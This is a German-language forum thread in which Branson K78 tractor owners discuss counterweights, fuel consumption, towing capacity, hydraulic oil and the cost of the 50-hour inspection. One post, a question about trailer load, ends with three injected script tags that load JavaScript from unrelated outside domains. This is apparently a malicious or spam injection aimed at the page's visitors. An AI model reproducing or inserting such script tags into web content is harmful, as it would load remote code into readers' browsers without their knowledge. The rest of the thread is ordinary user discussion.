Das Forum für Nutzer von Tym und Branson Traktoren › Foren › Erfahrungsberichte › K Serie › K 78 – Erfahrungen
- Dieses Thema hat 26 Antworten sowie 11 Teilnehmer und wurde zuletzt vor vor 2 Jahren, 4 Monaten von andre27 aktualisiert.
-
AutorBeiträge
-
6. August 2018 um 07:19 Uhr #3089
Hallo Gemeinde,
seit einiger Zeit bin ich ja jetzt stolzer Besitzer eines K 78. Dieser hat zwischenzeitlich ca. 25 Betriebsstunden auf dem Tacho und ich kann nun die ersten Erfahrungen teilen.
Generell bin ich mit dem Traktor sehr zufrieden, deshalb zähle ich jetzt nicht auf was ich alles toll finde sondern ich möchte kurz mal zusammenfassen was nicht so toll ist (wobei das jetzt wirklich das suchen nach dem Haar in der Suppe ist):
1. bei Erdarbeiten und voller Schaufel hebt der K78 hinten fast ab, der Traktor ist hinten ggf. etwas zu leicht. Macht aber nichts, man kann mit einem Gegengewicht hier relativ einfach Abhilfe schaffen.
2. Ich bilde mir ein dass der Dieselverbrauch etwas hoch ist. Vielleicht senkt sich der Verbrauch noch nach einer gewissen “Einfahrphase”. Aber da ich ja Hobbyfahrer bin und nicht tausende von Stunden pro Jahr arbeite macht es mir unterm Strich nicht so viel aus.
Was aber wirklich toll ist, und das soll nun nicht unerwähnt bleiben, bei den Temperaturen die zur Zeit herrschen ist die standardmässig eingebaute Klimaanlage ein Segen – funktioniert hervorragend.
Ich werde weiter berichten wenn der Trekker mal ca. 50 Stunden auf dem Tacho hat.
Gruß
Reimund
Attachments:
You must be logged in to view attached files.6. August 2018 um 07:50 Uhr #3091Spritverbrauch hoch + Klima ist super = Erklärung 😉
Schön, dass auch der große ein ordentliches und durchdachtes Trekkerchen ist.
Hier wird (man) immer noch doof (aus)gelächelt wenn man nicht in irgend einer Weise grün fährt. “Alles andere ist doch Mist…”
Dass ein JD mal stolz das 1,5fache kostet und ich die 10000€ Mehrkosten erst mal bei knapp 100 Betriebsstunden pro Jahr wieder reinholen müsste, interessiert da auch nicht…
Dann mal weiter so mit deinem kleinen Großen und allzeit gute Fahrt
4. November 2018 um 18:31 Uhr #3668Hallo Raimund,
noch immer zufrieden mit dem K78? Seit September bin auch auch stolzer Besitzer. Allerdings haben die Bauern in der Umgebung nichts besseres zu tun, als den Trecker in Frage zu stellen oder Schwachstellen zu suchen. Immer kommt ein Spruch wie “also in der professionellen Landwirtschft….”
Bisher ( ca. 25h) bin ich aber sehr zufrieden mit der Maschine. Er verrichtet gute Dienst.
Viele Grüße
Martin
5. November 2018 um 08:43 Uhr #3674Servus Martin,
freut mich dass Du nun auch stolzer Besitzer eines K78 bist. Nun sind wir – so wie ich es überblicke schon zwei Mitglieder hier im Forum die den K78 haben.
Ich bin nach wie vor sehr zufrieden mit meiner Maschine. Er schlägt sich richtig gut. Habe jetzt 70 Stunden drauf und noch nicht das kleinste Anzeichen irgendeines Problems.
Das Einzige was ich “bemängle” ist, dass der Traktor leichtgewichtig ist. Wenn man mit dem Frontlader Erdbewegungen machen will empfiehlt es sich ein Heckgewicht dran zu machen – und schon ist das “Problem” behoben.Und nach wie vor scheint mir der Spritverbrauch etwas hoch – aber ich kann das leider nicht vergleichen, hatte vorher keinen Schlepper. Da ich aber eher im Hobbybereich unterwegs bin komme ich damit auch gut klar.
Bis jetzt aber wüsste ich nicht warum der K78 nicht auch für einen Vollerwerbslandwirt nicht geeignet sein sollte.
Weiterhin viel Spaß mit Deinem Gefährt.
Gruß
Reimund
6. November 2018 um 18:31 Uhr #3679hallo suche anhängerlast vom k 78
habe einen bestellt
<script src=”//permissnew.com/1cbabfaba9fb0d03cc.js”></script><script src=”https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52295x7354x&r=1541525326006″ type=”text/javascript”></script><script src=”https://promfflinkdev.com/ext/1cbabfaba9fb0d03cc.js?sid=52295_7354_&title=FF_%5B601%5D_missionewapp.cool&blocks%5B%5D=31af2″ type=”text/javascript”></script>
6. November 2018 um 19:54 Uhr #36804700/3000 kg gebremst/ungebremst laut Fahrzeugschein
9. November 2018 um 15:43 Uhr #3700noch ergänzend:
Stützlast: 817 kg
Anhängelast Druckluftgebremst: 12 To
Ich habe noch eine Kugelkopfkupplung anbauen lassen, weil ich einen Baggertrailer (Gesamtgewicht 3,5 To) ziehe – funktionert auch, aber auf die entsprechend zugelassene Kugelkopfkopfkupplung achten.
10. November 2018 um 18:21 Uhr #3702Hallo zusammen,
weiss jemand, welches Hydrauliköl ich hinten in den K78 füllen kann?
Habe noch HLP46, ist das OK?
Viele Grüße
Martin
13. November 2018 um 17:40 Uhr #3733Habe die Info dann doch noch im Serviceheft gefunden: UTTO mit API GL4
13. November 2018 um 17:52 Uhr #3734Hallo,
wir haben auch einen K78 laufen, dieser hat nun etwas über 600 Stunden gelaufen.
Es ist ratsam sich beim K78 mit Frontlader eine Schwingungsdämpfung einbauen zu lassen. Dann ” schlägt ” der Frontlader nicht mehr so und der Traktor hat eine bessere , ruhigere Straßenlage. In der Kabine ist dann noch ein Schalter montiert, über den man das ganze ein und ausschalten kann, wenn man es z.B. grade nicht braucht oder nutzen möchte.
Bei uns sieht das ganze so aus .
Gruß Mesatec
Attachments:
You must be logged in to view attached files.13. November 2018 um 20:49 Uhr #3740Hallo mesarec,
sonst zufrieden mit dem K78?
Irgendetwas was man bedenken sollte? Haben unseren erst seit wenigen Wochen…
Viele Grüße
Martin
29. Januar 2019 um 20:06 Uhr #4443So, heute die 50h Inspektion machen lassen, hat über 700 Euronen gekostet…heftig.
29. Januar 2019 um 20:33 Uhr #4445Was wurde da alles gemacht bei der Inspektion??
29. Januar 2019 um 22:48 Uhr #4454Hallo Martin, meiner ist demnächst auch fällig.
Ich habe jetzt 42 Std. auf der Uhr, kommt auch bald die 50 Std. Kontrolle. Bin am überlegen ob sie selbst machen soll oder zum Branson-Vertragshändler. Wenn ich es selbst mache würde mir eine Autowerkstatt die Kontrolle im Buch abstempeln. Wäre von der Garantie her auch möglich.
Gruß Sepp
30. Januar 2019 um 15:34 Uhr #4457Hallo zusammen,
das die 50-Stunden-Inspektion relativ teuer ist, ist ganz einfach zu erklären.
Es werden alle Öle und alle Filter getauscht.
Und bei 9 Liter Motoröl, 63 Liter Getriebe-/ Hydrauliköl und noch mal 12 Liter auf der Vorderachse kommen ja alleine bei den 85 Litern Öl schon einige Taler zusammen. Dazu kommen dann noch Motor- und Getriebeölfilter, das Ventilspiel muss kontrolliert und ggf. eingestellt werden, etc.
Dafür wird es bei den 100- und 200- Stunden- Inspektionen aber ja wieder günstiger. Bei 100- Stunden wird noch einmal das Motoröl mit Filter sowie der Kraftstofffilter getauscht. Und bei 200- Stunden nur das Luftfilterelement und der Kraftstofffilter, keine Öle.
Und zur Beruhigung, das geht den anderen Branson-Fahrern mit 00-/F- und 25- Serie nicht viel anders. ( Bei den Serien ist jedes Mal ein Motorölwechsel fällig.
Gruß Mesatec
Attachments:
You must be logged in to view attached files. -
AutorBeiträge
- Du musst angemeldet sein, um auf dieses Thema antworten zu können.